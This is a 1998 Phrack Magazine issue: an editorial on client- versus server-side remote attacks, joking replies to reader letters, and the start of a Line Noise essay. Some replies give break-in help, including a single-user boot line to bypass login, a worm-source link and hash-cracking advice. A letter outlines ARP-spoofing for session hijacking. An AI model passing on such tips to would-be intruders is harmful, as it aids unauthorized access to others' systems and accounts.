---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 01 of 15 -------------------------[ P H R A C K 5 3 I N D E X --------[ Rumble in the Mumble More than 6 months have passed since our last offering. My most humble, sincere and heartfelt apologies. At long last, here we are. Better late then never, that's what I always say. Unless of course, the late version sucks, then I just like to disavow it entirely. Well, here we go again. Another Phrack issue to glorify behavior which would otherwise be classified as sociopathic or frankly psychotic (according to Mich Kabay). More of what you want, more of what you need. Technical articles on fanatically enticing topics, lines and lines of glorious source, another gut-busting installment of Loopback, and of course, the News. Mammas, don't let your babies grow up to be hackers. Or hookers for that matter. Alright. Let's get down to business. Let's talk remote attack paradigms. Remote attack paradigms can fall into one of two types, based off of the standard client/server communication paradigm (we are glossing over any extensions to the model like client to client or server to server stuff). The two attack types are client to server (server-centric) and server to client (client-centric). Server-centric attacks are well known, understand and documented. Client-centric attacks are an area that is often overlooked, but is definitely fertile ground for exploitation. Below we look at both. ----[ Server-Centricity Historically, the vast majority of remote attacks have been server-centric. Server-centric, in this scope, refers to attacks that target server (or daemon) programs. A common (and frequently reoccurring) example is sendmail. The attack targets a server (the sendmail daemon) and approximates a client (the exploit program). There are several reasons why this has been the trend: - Server programs typically run with elevated privileges. Server programs usually require certain system resources or access to special files that necessitate privilege elevation (of course we know this doesn't have to be the case; have a look at POSIX 6). A successful compromise could very well mean access to the target system at that (higher) privilege level. - Discretion is the attacker's whim. The client/server message paradigm specifies that a server provides a service that a client may request. Servers exist to process clientele requests. As per this model, the attacker (client) makes a request (attack) to any server offering the service and may do so at any point. - Client codebase is usually simple. Dumb client, smart server. The impact of this is two-fold. The fact that server code tends to be more complex means that it is tougher to audit from a security stand-point. The fact that client code is typically smaller and less complex means that exploitation code development time is reduced. - Code reuse in exploitation programs. Client-based exploitation code bases are often quite similar. Code such as packet generators and buffer overflow eggs are often reused. This further cuts down on development time and also reduces required sophistication on the part of the exploit writer. All of these make server-centric attacks enticing. The ability to selectively choose a program to attack running with elevated privileges and quickly write up exploit code for it is a powerful combination. It is easy to see why this paradigm has perpetuated itself so successfully. However, up until recently it seems another potentially lucrative area of exploitation has gone all but overlooked. ----[ Client-Centricity An often neglected area of exploitation is the exact reverse of the above: client-centricity. Client-centric attacks target client programs (duh). The types of programs in this category include: web browsers (which have seen more then their share of vulnerabilities) remote access programs, DNS resolvers and IRC clients (to name a few). The benefits of this attack model are as follows: - Automated (non-discretionary) attacks. We know that, under the previous paradigm, the attacker has complete autonomy over who s/he attacks. The benefit there is obvious. However, non-discretionary attacking implies that the attacker doesn't even have to be around when the attack takes place. The attacker can set up the server containing the exploit and actually go do something useful (tm). - Wide dispersement. With client-centric attacks you can gain a wider audience. If a server contains a popular service, people from all over will seek it out. Popular websites are constantly bombarded with clientele. Another consideration: server programs often run in filtered environments. It may not be possible for an attacker to connect to a server. This is rarely the case in client-centric attacks. - Client codebase not developed with security in mind. If you think server code is bad, you should see some client code. Memory leaks and stack overruns are all too common. - Largely an untapped resource. There are so many wonderful holes waiting to be discovered. Judging at how successful people have been in finding and exploiting holes in server code, it goes to figure that the same success can be had in client code. In fact, if you take into account the fact that the codebase is largely unaudited from a security perspective, the yields should be high. For all the above reasons, people wanting to find security holes should be definitely be looking at client programs. Now go break telnet. Enjoy the magazine. It is by and for the hacking community. Period. -- Editor in Chief ----------------[ route -- Phrack World News --------------[ disorder -- Phrack Publicity ---------------[ dangergirl -- Phrack Librarian ---------------[ loadammo -- Soother of Typographical Chaos -[ snocrash -- Hi! I'm an idiot! -------------[ Carolyn P. Meinel -- The Justice-less Files ---------[ Kevin D. Mitnick (www.kevinmitnick.com) -------- Elite --------------------> Solar Designer -- More money than God ------------[ The former SNI -- Tom P. and Tim N. -------------[ Cool as ice, hot as lava. -- Official Phrack Song -----------[ KMFDM/Megalomaniac -- Official Phrack Tattoo artist --[ C. Nalla Smith -- Shout Outs and Thank Yous ------[ haskell, mudge, loadammo, nihilis, daveg, -----------------------------------| halflife, snocrash, apk, solar designer, -----------------------------------| kore, alhambra, nihil, sluggo, Datastorm, -----------------------------------| aleph1, drwho, silitek Phrack Magazine V. 8, #53, xx xx, 1998. ISSN 1068-1035 Contents Copyright (c) 1998 Phrack Magazine. All Rights Reserved. Nothing may be reproduced in whole or in part without written permission from the editor in chief. Phrack Magazine is made available quarterly to the public, free of charge. Go nuts people. Contact Phrack Magazine ----------------------- Submissions: phrackedit@phrack.com Commentary: loopback@phrack.com Editor in Chief: route@phrack.com Publicist: dangergrl@phrack.com Phrack World News: disorder@phrack.com Submissions to the above email address may be encrypted with the following key: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzMgU6YAAAEH/1/Kc1KrcUIyL5RBEVeD82JM9skWn60HBzy25FvR6QRYF8uW ibPDuf3ecgGezQHM0/bDuQfxeOXDihqXQNZzXf02RuS/Au0yiILKqGGfqxxP88/O vgEDrxu4vKpHBMYTE/Gh6u8QtcqfPYkrfFzJADzPEnPI7zw7ACAnXM5F+8+elt2j 0njg68iA8ms7W5f0AOcRXEXfCznxVTk470JAIsx76+2aPs9mpIFOB2f8u7xPKg+W DDJ2wTS1vXzPsmsGJt1UypmitKBQYvJrrsLtTQ9FRavflvCpCWKiwCGIngIKt3yG /v/uQb3qagZ3kiYr3nUJ+ULklSwej+lrReIdqYEABRG0GjxwaHJhY2tlZGl0QGlu Zm9uZXh1cy5jb20+tA9QaHJhY2sgTWFnYXppbmU= =1iyt -----END PGP PUBLIC KEY BLOCK----- As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED. Phrack goes out plaintext. You certainly can subscribe in plaintext. phrack:~# head -20 /usr/include/std-disclaimer.h /* * All information in Phrack Magazine is, to the best of the ability of the * editors and contributors, truthful and accurate. When possible, all facts * are checked, all code is compiled. However, we are not omniscient (hell, * we don't even get paid). It is entirely possible something contained * within this publication is incorrect in some way. If this is the case, * please drop us some email so that we can correct it in a future issue. * * * Also, keep in mind that Phrack Magazine accepts no responsibility for the * entirely stupid (or illegal) things people may do with the information * contained here-in. Phrack is a compendium of knowledge, wisdom, wit, and * sass. We neither advocate, condone nor participate in any sort of illicit * behavior. But we will sit back and watch. * * * Lastly, it bears mentioning that the opinions that may be expressed in the * articles of Phrack Magazine are intellectual property of their authors. * These opinions do not necessarily represent those of the Phrack Staff. */ -------------------------[ T A B L E O F C O N T E N T S 1 Introduction Phrack Staff 11K 2 Phrack Loopback Phrack Staff 33K 3 Line Noise various 51K 4 Phrack Prophile on Glyph Phrack Staff 18K 5 An Overview of Internet Routing krnl 50K 6 T/TCP Vulnerabilities route 17K 7 A Stealthy Windows Keylogger markj8 25K 8 Linux Trusted Path Execution redux K. Baranowski 23K 9 Hacking in Forth mudge 15K 10 Interface Promiscuity Obscurity apk 24K 11 Watcher, NIDS for the masses hacklab 32K 12 The Crumbling Tunnel Aleph1 52K 13 Port Scan Detection Tools Solar Designer 25K 14 Phrack World News Disorder 95K 15 extract.c Phrack Staff 11K 482K ----------------------------------------------------------------------------- " The advent of information availability and a rise in the number people for whom the net has always been 'the norm' is producing a class of users who cannot think for themselves. As reliance upon scripted attacks increases, the number of people who personally possess technical knowledge decreases. " ----------------------------------------------------------------------------- ----[ EOF ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 02 of 15 -------------------------[ P H R A C K 53 L O O P B A C K --------[ Phrack Staff [ Ed. note: The letters are perhaps editted for format, but generally not for grammar and/or spelling. I try not to correct the vernacular, as it often adds a colorful perspective to the letter in question. ] 0x1>-------------------------------------------------------------------------- [ P52-02@0xd: ... Something you've mailed to a whiley bunch... ] I couldn't help but notice your use of "whiley" rather than the more common English word "wily" in the above-quoted paragraph. In the future, take the time to grammar and spell check your replies to minimize the emotional damage you are bound to suffer. --Bob Stratton [ WHOA! My bad. Strat has caught me with my proverbial pants around my proverbial ankles. Further evidence towards me - not - being omnisicient argument (although I still believe this to be conjecture). ] P.S. Thanks for the sensible code-formatting discussion. Your style sounds a lot like that which kept me sane back when I earned my living writing code. The enlightened person's answer, of course, is to use an Emacs minor mode, and to let the editor do the work while one types. Emacs is also the answer to the Windoze 95 junkie looking for something with which to read Phrack. Works for me. [ Amen. Except for the emacs part. pico with regexp or vim 5.0 with syntax highlighting is the way to go. ] 0x2>-------------------------------------------------------------------------- [ P52-09: On the Morality of Phreaking ] Dear Phrack, I am not a hacker nor a hacker wannabe, so I had only the most passing acquaintance with your publication. However, today by chance I came across this article in your January 26 issue. I am impressed. I did my MA in philosophy, and I was quite nonplussed to see such a lucid and philosophical point of view in what is, to my understanding, a very specialized publication not typically devoted to philosophy. Though my areas of interest were mainly Nietzsche and Deleuze, I found your summary of both Mill and Kant to be accurate and well-applied. Kudos, you obviously have some very intelligent people on staff, whose talents are not limited to your own area of expertise. Yours respectfully, Sean Saraq Toronto [ High praise indeed! Thank you for the compliments. It's good to see we're read in communities other then that of our target demographic. ] 0x3>-------------------------------------------------------------------------- I can't believe you included article 12 in Phrack 50. Is Phrack really getting so sad? Have you really got nothing better to publish than regurgitated crypto babble? [ Despite what you may think, we are not sad. The phrack compound is imbibed with much conviviality and festivity. Why, every Friday is `punch a mime day`. We hire a mime to come down to the office and we all take turns punching him in the face. ] Cheers, Chris (XORed that's Fghyud) [ That's not a very good XOR implementation you have there. It appears an extraneous character has been inserted. Check your pad or the stream cipher. Or perhaps check your other regurgitated crypto babble for more info. ] 0x4>-------------------------------------------------------------------------- For those readers interested in "Piercing Firewalls" (Phrack Issue 52) take a look at datapipe.c available at www.rootshell.com. I can't think of any way to make it work with X, like tunnel/portal, but it works fine with telnet and nothing needs to be running outside the firewall. ziro antagonist [ Noted. ] 0x5>-------------------------------------------------------------------------- Okay, enough nagging about the Milla pics! The one thing everyone reading Phrack wants to know is: When will you publish nude pictures of dangergrl ??? [ When your mom gives them back. ] Yours Sincerely, -anonymous. (i get kicked from #hack enuf as it is already :) [ What a suprise. ] 0x6>-------------------------------------------------------------------------- While the Juggernaut program is interesting, I've found that its model for session stealing is a tad limited. There are two issues, one of which I've dealt with. First issue is the one packet read, one packet written paradigm. It really should allow separate threads for read/write to avoid getting easily out of synch. This I've not dealt with, but it is understandable given the second, the ACK storms it creates. [ Juggernaut 1.x is very primitive in many ways. Juggernaut++, the next generation juggernaut, has been mostly redesigned from the ground up with a 90% new code base. It has many things the previous versions lacked, including: a much better interface, threading for concurency, portability, effcicieny mods, and many bugfixes. ] The ACK storms can be avoided with an ARP attack (or possibly an ICMP redirect). Send an ARP message to the source of the connection you're stealing (an ARP reply) which tells it that the ethernet address of the machine it's talking to (the destination machine, which you want to talk to instead) is something "off in space" like 2:3:4:5:6:7 instead of the real address. This needs to be done fairly often, should be started immediately before you start your hijack attack. [ Indeed. As long the host will accept and cache unsolicited ARP responses, this will work. ] The result is that the machine you are intercepting becomes unable to talk to the destination and won't desynch the session, and traffic goes to practically nothing. After you stop, the ARP table will shortly expire and be updated with correct information, so the attack will either appear as a network glitch, or you'll get alerted (NT will alert) that an IP address conflict exists (but tell nothing about what the conflict is with). Moreover, an ARP reply will escape the notice of many network monitoring programs. [ Something like this has in fact been implemented in juggernaut++... And, just to answer the burning question I get asked so often, NO, J++ is NOT publically available. ] I have sent the code to the original author of Juggernaut (being inclined to share knowledge) and wanted to alert you. [ The original author of juggernaut and I are pretty close. I'll be shure to check with him. ] 0x7>-------------------------------------------------------------------------- Hi! My name is StiN. [ Mine's route. ] I'm from Russia. [ I'm from the U.S. ] Sorry for my bad English. [ Sorry for my bad russian, comrade. ] I Have a friend His name is Armany. [ I have a friend named Gilgamesh. ] Where do you live? [ I live in a small one bedroom aprartment with four cats. ] How old are you? [ 19. ] What's yore name? [ We already went over this. ] What's yore Hobby? [ Volunteering for free medical tests of any variety. ] Do you knew Russia? [ I KNEW RUSSIA BACK IN THE GOOD OLE' DAYS! Back before the collapse. ] Good Bay. [ Bad Bay: Bay of Pigs. Good bay: Bay of jello. ] 0x8>-------------------------------------------------------------------------- Hola, soy Omar Soy un fanático de su revista, la sigo desde la phrack 48. No soy un hacker, phreaker, o cualquier cosa, soy más un fanático de las malditas máquinas. Muy buenos artículos; gracias por las cosas de LINUX (me fueron de mucha utilidad) Suerte y sigan así. Saludos de Uruguay. South América. [ Yo quiero taco bell. ] 0x9>-------------------------------------------------------------------------- hi, where can i find the source code for the legendary internet worm by morris (1988) ? thanx (i hope u dudez can help me :( ) [ ftp://idea.sec.dsi.unimi.it/pub/crypt/code/worm_src.tar.gz ] 0xa>-------------------------------------------------------------------------- My friends were going to a basketball game at their gay school (Grades [ Wow, they have gay schools now? Do they videotape you jerking off and looking completely gay and stupid? (http://www.leisuretown.com) ] pre-school through 8th grade). They were wearing their wallet chains, not causing any harm with them. (It was an after school activity) the [ As opposed to those people who have the wallet-chain/morning-stars. They are the ones who cause all that wallet-chain inflicted harm. ] teachers made them take them off. My friend, Krazy K, asked if he could [ Krazy K? Any relation to Daft D? ] take off the chain and keep the wallet, but they made him give them the whole thing. He thought it was funny, though, especially since he had condomes in it (It is a "christian" school). Not that he was going to [ Condomes! The condom that's a tent! ] use them. They of course being the nosy bastards that they are, rummaged around in it to their liking and found them. (We know because they talked to him about it. [ Good detective work. ] He told them it was a joke he was going to do to his friend. "I was going to put it in his locker" He said.) [ Now *that's* good humor. ] I was wondering about the legality of this whole thing. Is it legal [ Perhaps you should wonder about the stupidity of the whole thing first, then work your way towards relevance, and then back to stupidity again. ] to take someones wallet and chain (Which I consider personal property) when it is an after school activity and then look through it? They gave [ *shrug* Sure is fun though, isn't it? Actually, I don't know the laws and regulations of gay schools. It just might be allowed. ] him no alternative (but to go home, and, "Oh by the way, you can't use the phone"). Then to search through the wallet without permission of the owner? I am asking because, I would like to get them in trouble, In retaliation to the many times I've been screwed there (I go to high [ Been screwed at the gay school? Hmm. Did you have any condomes? ] school now, thank God). If you could tell me, or know of someone who knows, then that would help us. Thanks, Abs0lute Zer0 [ You can say that again. ] 0xb>-------------------------------------------------------------------------- Dear Editor, I would like to take a chance to give my most sincere thanks for resurrecting my uttermost respect to the humanity (so often shattered by politicians and other freaks) by providing me a unique opportunity to immerse myself into the deep wisdom and magic of written word found in the Line Noise section. This is truly the place where one can look for (with a sense of deep confidence) a genuine proof that every person is a genius on the inside. [ Well thank you very much. Although I think you are refering to loopback. ] Driven by this wonderful feeling of replenished hope and respect, I'd like to answer a cry for help from a young but talented Hacker Demonhawk, who expressed a wish to "blow shit up!!". I used to be a chemist, and I would [ Ummm... ] like to share, in the spirit of the magazine, my knowledge and provide easy, quick instructions for young fighting souls that would assist them in the aforementioned noble cause. In other words, how to build a bomb. [ Whoops. You just lost me there. ] { rest of message truncated due to overwhelming levels of inanity ... } 0xc>-------------------------------------------------------------------------- where would one go to get "private" hacker help? [ In the back where they give the lapdances. ] 0xd>-------------------------------------------------------------------------- sorry to bother ya... i was hoping maybe you could give me some info. don't take me for a complete idiot, [ Uh oh. ] i just don't know much about this kind of stuff. maybe u could get me started... give a few tips??? [ Sure. Never kiss on the first date. Always pack an extra pair of socks AND underwear. Never put electrity in your mouth 'just to see what would happen'. Also, if you happen to find yourself in the position, always at least *ask* to give someone the reach-around; it's common courtesy. ] 0xe>-------------------------------------------------------------------------- Hello, My name is Robert I guess you could call me a beginner hacker I I was wondering if you could please help me out I need some hacking numbers and [ Ok. 7, 9, 11, 43, and 834. ] passwords just so I can play around on them and get good. Also if you have [ Sure. Try `password`, `hacker12`, `pickle`, and `love`. ] any files or anything that you think that would be helpful to me please attach [ Alright, /dev/random is a good one to start with. ] or tell me where I can get them. I just bought the book Secerts Of A Super Hacker By Knightmare is that any good if there is any books I should get [ Ah yes, the book of the truly desperate and depraved. As was said once before by Voayger, Knightmare's biggest hack was getting that book actually published. ] please tell me or if you have any text please send. I am running windows 95 [ Can you put Windows 95 in your mouth? NO! Such is Mango! ] Thanks For Ur Time Robert 0xf>-------------------------------------------------------------------------- Dear Sir I like you hacker people because you made life easy to a lot of people [ Especially the makers of fine Bavarian shoe-horns. ] I want to ask you an important question to me When connecting to Internet, I found that some sites inform me with my ISP IP# So if they're any possibility that any site can track me and identify the following 1-what country I came from? [ Well; if you're dialing up to your ISP, and connecting to 'sites' from there, that would be a one hop jump out to the world. And yes; they could find out what country you're coming from, unless you're dialed into a provider in another country. In which case; it might be a little more difficult. The other tipoff is when you scan in your birth certificate and put it up on your webpage along side your current address and a head shot. That's a 'no-no'. ] 2-what is my phone number? [ Are you asking us if we know your number? Or if someone can find your number when you connect to their machine and they know your IP address? I'm confused, so I'll answer the question both ways. A-1: No. We don't know your number, and we don't want it. While we're at it. We don't want to make out with you either. Quit sending us the flowers. It's over this time once and for all. A-2: If you did something that would incite someone to try to find your phone number; odds are if it was an illegal action your ISP would gladly hand your information to the first law enforcement person who walked through the door. Or for that matter, anyone who asks nicely. ISPs aren't exactly known for being well guarded vaults of information. ] Globally can any site by coordination with my ISP track me and catch me? [ Ever hear of Kevin Mitnick? ] Please provide me with a full answer quickly. [ Do people not realize this is a quarterly magazine? Quick for us is 3 months. If you've done something stupid and gotten busted; our sincerest apologies for being late. Next time we'll drop what we're doing and get right to it. ] 0x10>------------------------------------------------------------------------- I am a Indiana University student currently studying Criminal Justice. I am trying to gather data and find information concerning computer hacking and governmental and/or corporate involvement. The twist that I am persuing concerns a rumor that I had heard. I was told that when some computer hackers were caught, they were recruited by the government and/or corporations to work in their security department. Usually where there is a rumor, there is some truth to the matter, especially when concerning the department of defense. I don't know if you could help me find information concerning this issue. Any help would be greatly appreciated. Respectfully, Jason Sturgeon [ Well... We at Phrack haven't heard anything about the DoD hiring 'hackers', it's been our understanding that the government at least prefers straight laced guys with military background to handle their stuff. Although it's not out of the realms of possibility that they've hired 'hackers', if it's happened it's of rare occurance, and those individuals who fit the title of 'hacker' probably don't conform to your definition of what a 'hacker' really is.. Corporations and The Government for the most part tend to shy away from 'hackers', if merely for the stigma of being a 'hacker'. But as a stereotype, hackers conjur up all sorts of bad mental images for respectable management types. We're sure it's happened to some capacity, but we have no witty anticdotes concerning it. ] 0x11>------------------------------------------------------------------------- Hello there I have heard there are some risks using callback modems. Can you give me some more info on this, or info where to look [ Risks of callback modems are fairly simple. The problems involved with them are a little bit more complex. We'll discuss both in an effort to best cover this subject. The overall fundamental flaw of callback modems is the idea that you could 'fake' a hang-up on your end, or play a dialtone in an effort to fool the modem into thinking it hung up. Then you wait for it to dial the number, and once it's done, 'ATA' your modem and pick up the carrier. We ourselves have tested this a couple times with moderate success, it's not 100% accurate, and it also depends on the hardware on the remote side. If the call-back information is based of ANI, that could provide more problems, since the Phrack staff has heard the rumor that you can fake ANI with certian types of ISDN set-ups. The two types of callback modem configurations, one being a program that acts as a frontend to the dialing mechanism, the other being hardware based. Such as, you dial in to the modem, the program asks you to authenticate yourself by some means, you do so; it hangs up and calls the number that's paired with your authenication information. This isn't so bad, but if anyone remembers back when certian BBSs had callback that you could enter, you could make them call arbitrary phone numbers by putting in a fake number if their door was misconfigured. As far as hardware based call-back, whence you program the passwords and numbers into the modem and it deals with the whole transaction, introduces a scalability issue as well as the fact that the modem has no means to log on it's own, etc.. etc.. etc. If any readers wish to write an article based on this subject you are urged to write it and send it in. It'd be nice to see some more solid information on this subject. As well; if any companies wish to send us modems, we urge you to send us some modems so we can put them up against a battery of hacker tested and hacker approved tests. ] 0x12>------------------------------------------------------------------------- I would like to know about cellular phones....how to find out secret pin, how to listen to calls etc.... [ I would like to know more about marshmellows. How they're planted, the way they're picked in the spring time as they blossom from the little tiny buds you get in 'Swiss Miss Hot Coco', to the fat chewey vessles of taste and excitment that they are at full maturity. I would like to find out the secrets of gravity, as well as a good solid reason why the universe keeps 'expanding' -- without any of that "just because" rhetoric that seems to dominate the subject. ] If You need the cellular make I'll be obliged to give it to you.... [ Wow. You'll give us your phone just so we can look at it? Send us your home address and we'll send you a S.A.S.E to mail it back to us in. ] Thanks. Anthony. [ No. Thank _you_ your generosity Anthony! ] 0x13>------------------------------------------------------------------------- Hiya, Not wishing to sound like a playboy forum article but I have read phrack for [ Already my interest is waning... ] quite a while and have only seen cause to write now. I commend you on your editorial on C programming style. The sooner we get out [ And I commend you on your commendation. +100 points. ] there and club to death those people that use single space indentation the better. I do however have three main points to disagree with you on. 1. Write as many comments as you can. You may need to remember what it was you where coding AFTER copious amounts of recriational drugs. [ Nah. You don't want to get out of hand with the commenting. You end up commenting needlessly and redundancy abounds. And if you can't read your own code, kill yourself. -100 points. ] 2. Put your own varaibles with uppercase first letters (to distinguish them from sys vars) [ `sys vars`? What like argc, argv or errno? This is a ridiculous suggestion. It makes your code ugly and harder to parse. I award you no points. ] 3. In reference to your comment "In the grand scheme of things, none are really any more correct than any others, except mine." It must be said that this is completely wrong. The only point that counts is in fact mine. [ Not when it's in my magazine. With a final score of 0, you lose. ] Regards, andrewm at quicknet dot com dot au [ Cute. ] 0x14>------------------------------------------------------------------------- Dear Guys, First off, I'd like to say that I am ever more impressed with the quality of each successive issue of Phrack. [ Danke. ] The reason for this mail it to respond to the request made by N0_eCH0 in Ireland in issue 52. Myself and a few friends are happy to help this guy out if we can. I'm afraid that we're no great sources of knowledge, but are willing to have a crack at most things. Anyway, if you can pass this on, as there was no e-mail address for N0_eCH0, I'd be much obliged. Keep up the excellent work, I look forward to issue 53 ! ben_w@netcom.co.uk [ There you go. ] 0x15>------------------------------------------------------------------------- To whom it may concern: I was wonder how I can read someone dir and take over their account the kernal is 2.0.0. How could I hack into the system without having a passwd!! [ I assume you mean Linux. `LILO: linux init=/bin/sh`. Oh, and you need console access. Good luck. ] Thanx! Tag 0x16>------------------------------------------------------------------------- [ P52-19@0x2: Statement of Louis J. Freeh, Director F.B.I... ] Hello, I would like to say that the article, published as P52-19 is without a doubt one of the most frightening threats to our freedom that man has ever seen. the article is: "The Impact of Encryption on Public Safety Statement of Louis J. Freeh, Director Federal Bureau of Investigation" This article basically states that Americans should have now personal communication rights whatsoever. The Director of the FBI practically states that strong encryption should be banned from the public, because he wants law enforcement officers to be able to read all of our mail. He says that this would be for reasons of terrorists and criminals, but fails to state that the security of the average American would be compromised. Due to his proposal that you would have to forfeit your key to government officials, and that these keys would only be used "for the immediate decryption of criminal-related encrypted communications or electronic information.". Or maybe this way the government can just intrecept all of your communications. My main objection to this is the irrelevancy that this would have to the general public. According to US law, the US Postal Service is the ultimate form of private security. The average American should be able to send a letter to anywhere in the world, and it should be completely safe. And what more can you send with encrypted email? A program, but you can do that with a disk in a letter. So whats stopping these terrorists from hopping on down to the Post Office? Another problem with this proposal is that encrypted information is more used to protect your information from other parties then the government. I can guarantee that the average Joe living down the street is encrypting his love letter to his mistress Jane so that his wife doesn't see int, not so that some lazy, fat, government "official" doesn't see it. Most people use this technology for much more practical usage than the deception of the government. We use it because of the millions of people on the Net, and perhapse we don't want those millions to see every little thing about our personal lives. And finally, why should the government be able to restrict our right to gather peacefully? With technology moving so fast, i think that it is reasonable to assume that the Internet is a gathering place? We have all of the means of normal communication and more. Chat rooms, email, and programs like Mirabilis's ICQ allow us to communicate on a whole new level. In light of all of this, i hope you share my opinions now about the loss of freedom that this would represent. Thank you. 0x17>------------------------------------------------------------------------- Hi, I am a little sysadm on a little Linux-Server on the net. [ I have little interest in those details. ] I am searching for documents about System Security under Linux/UNIX just to be up-to-date :) Thank you for your help. [ http://www.redhat.com/linux-info/security/linux-security/ ] And btw...I have parts of the /etc/shadow file from my ISP...what can I do with this? Can I just run crack over it? [ Well now, that all depends on what parts you have, doesn't it...? If you have the encrypted hashes, then you're in business. ] And, btw: Not all germans hate americans...I am german and I don't hate americans... and my generation has nothing to do with the WWII... [ Oh, I think you do. I am relatively certian that, somewhere deep down, you dislike us. You couldn't take a shellacking like you did in WWII (not to mention spaetzle) and *not* feel some sort of resentment. It's ok. Embrace your malevolent feelings. Hug them. C'mon! Once you've done that, you can dissolve them. I admonish you to TURN THAT FROWN UPSIDE-DOWN! Cmon! Bodyslam yourself into gayness! ] -firefox01 0x18>------------------------------------------------------------------------- Hello there, good to talk to you. [ Likewise. ] I am just this "Thinker" with this thought why don't we the Hackers and you the one of the major contributing Hacker commune (2600,Phrack,ect) make a Full Strong "live" Cryto network for the Hacker and by the Hacker. [ I have a thought. Get a speak n' spell. ] I can't belive I am sending this from hotmail bought out by microshit blah blah no this thing must be really insecure. [ Well, maybe it just needs love and attention and for someone to say nice things to it. ] Well I have a whole line of ideas and no one ever listens to me netscape ect... but if your intrested e-mail me back and I'll give you my POP adress. The benifit of this system is 1) we can piss off the FBI [ Yes, let's piss off the F.B.I. And, while we're at it, let's piss off the IRS and let's annoy the CIA.. We can poke fun at the retarded wrestlers association. And lastly, let's aggravate an enraged bull. ] and 2) final we hackers can have a place to loyter and idile , lurk at [ loyter and idile? Hey, aren't they those two Jewish film critics? I love them! ] where we can say what ever the Hell such as Full deatails on how to enter a sys,ect...of corse we will have to screen ppl for trust ect... [ And screen them for stupidity. ] But I reall belive we can werk this. If you want to here the rest of my ground shaking ideas just ask, or full deatials on the Crypto.net . [ Pass. ] 0x19>------------------------------------------------------------------------- First off, I'd like to say that I love the mag...but you really get some nutjobs that post to it..(myself included) I'm not an elite hacker, a unix guru or anything like that(duh), but I am amazed at the effort you put into Phrack...anyways, keep up the good work [ Thanks, nutjob. ] 0x1a>------------------------------------------------------------------------- Hello, Who was the first hacker in history? [ God. ] thanks for your time, greetings, Max 0x1b>------------------------------------------------------------------------- Hi. i'm a Swedish kid and i just wonders [ Now the Swedes I like. Beautiful women. Amazing accents. I *think* they like me. Although this one particularly hot Swedish girl I know doesn't seem to like me much. I think maybe it's because I try too hard around her. She'll come around and I'll be like bouncing off the walls trying to impress her.. I remember one time I got so excited I almost set sail for gaiety. I know. I know. I should "just relax" and everything will fall into place. I dunno tho. She's so pretty. And ahm just so awkward... ] if you might know a good haking, freaking and craking site. I've checked everywhere but i have not any. [ Huh? ] 0x1c>------------------------------------------------------------------------- Hey sup, I'm makin an essay site similar to Slackers Inc. but with more essays. The only problem is I need sponsors to get my page up, can you pay me a small fee monthly for displayin a banner for your site. I know almost [ O.k. Sure, how does nothing/month sound? ] everybody knows about Phrack Magazine but I heard you do some sponsoring, E- mail me back if you are interested. [ Yah, we are *so* reknown for our advertising budget. And now I'd like to make Phrack reknown for sponsoring a gay fucking highschool/college paper stealing webpage. Sure. I'll get right on that after we do our 'kick a baby harp seal campaign'. ] 0x1d>------------------------------------------------------------------------- You need to write an Interactive tutorial to simulate hacking into a private college or a company. You should make it realistic and hard to access. [ Someone already did. They're called *.edu and *.com. Although sometimes they're not too realistic. ] 0x1e>------------------------------------------------------------------------- [ P52-14: International Crime Syndicate Association ] Dorathea Demming, You remark that the ICSA doesn't guarantee their certification against attack. "In plain English, they are saying that if you get sued, you are on your own." Do you know of any security company, consultant, or consortia that will commit to helping a customer legally if they've been attacked? Stu 0x1f>------------------------------------------------------------------------- In skateboarding you are a "poseur" if you don't know shit. In the computers culture you are a "lamer" if you don't know shit. The term that bugs me is "elite" or "eleet" or "3l33t3". Are you elite? I just don't like the term. I really like the term "HI-FI" ,as in high-fidelity, or high-fidelity stereo's. An outdate term that orginally meant "I've got the best gear". But now it just means "late 70's marketing scheme". Are you hi-fi? It has a ring to it. You may be elite right now but in time you'll be hi-fi. ------------------------------------------------------------------------------ ----[ EOF ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 03 of 15 -------------------------[ P H R A C K 5 3 L I N E N O I S E --------[ Various 0x1>------------------------------------------------------------------------- On not being a moron in public - nihilis (In response to why cantor kick-banned someone off of #Phrack without warning: you were an idiot near me i hate that) I wouldn't think normally that this is an article which needs to be written. But as experience has shown, it may very well be. Several months ago I was on the IRC EFnet's channel #phrack and one of the users spouted a URL for a web page he and his cohorts had hacked. On it he had kindly sent salutations to everyone he knew and to Phrack. We, the other occupants of the channel all admitted that none of us spoke authoritatively in the magazine's behalf, but that we were confident that none of the editorial staff would appreciate being implicated in a felony by association. The user didn't seem to understand. The next day, when the user was asked to join some of the authorities at the local station-house for a short interview, I'm sure he wet his pants. The line of questioning was short: it merely established that he had not been the culprit in further attacks on the same host. The police released him uncharged. In discussions with him later on #Phrack, we weren't surprised to find that he had been apprehended. As things played out, the user clearly felt no crime had been committed: All he did was change a web page. He adamantly protested that he didn't do any damage, he didn't put in any backdoors, he didn't know that root's .rhosts contained four simple bytes: "+ +\n". Clearly this user didn't look very hard in what were apparently his several weeks of attempting to hack the site. Interestingly enough, I haven't seen this user on IRC since about a week after the episode. There are several morals to this story: Hacking is a felony. Any unauthorized access constitutes hacking. If you do hack something, don't be a moron about it. It's likely always been this way, but it's only been more recently I've been paying attention, I suspect: The advent of information availability and a rise in the number people for whom the net has always been "the norm" is producing a class of users who cannot think for themselves. As reliance upon scripted attacks increases, the number of people who personally possess technical knowledge decreases. Today I was lurking and watching the activity on #Phrack while tending to issues at work. The two largest discussions which come to mind are that SYN flooding cannot be prevented, even using the newest Linux kernel; and what 0x0D means and that, yes, it is interchangeable for 13 in a C program. For the latter, the opposing point of view was presented by "an experienced C programmer." This was actually a civil conversation. People in-the-know were actually a little more crude than necessary, and the groups in need of reeducation admitted faults without needing four reference sources and three IETF standards quoted. It was a good day. People these days seem generally unwilling to concede that someone else on the Internet has done their homework, has studied the standards, and has an advantage. They consider themselves experienced because they got an unpatched Windows NT to bring up the Blue Screen Of Death remotely using a program published four months ago. They hack web pages and put their names on it. They seem unwilling to read the code given to them to establish exactly what happens when the newest 0-day exploit runs. They do not find the holes. They seem generally more interested in fucking someone over (unaware of potential consequences) than in really solving any sort of technical problem. It's all a race, it's all a game, it's all a matter of who has the newest tools. I'm writing this now because I'm sick of that. I'm sick of people who think they're smart and are intent on making sure I know it by putting their feet in their mouths. I'm sick of people who persistently ignore advice given to them and get angry when the 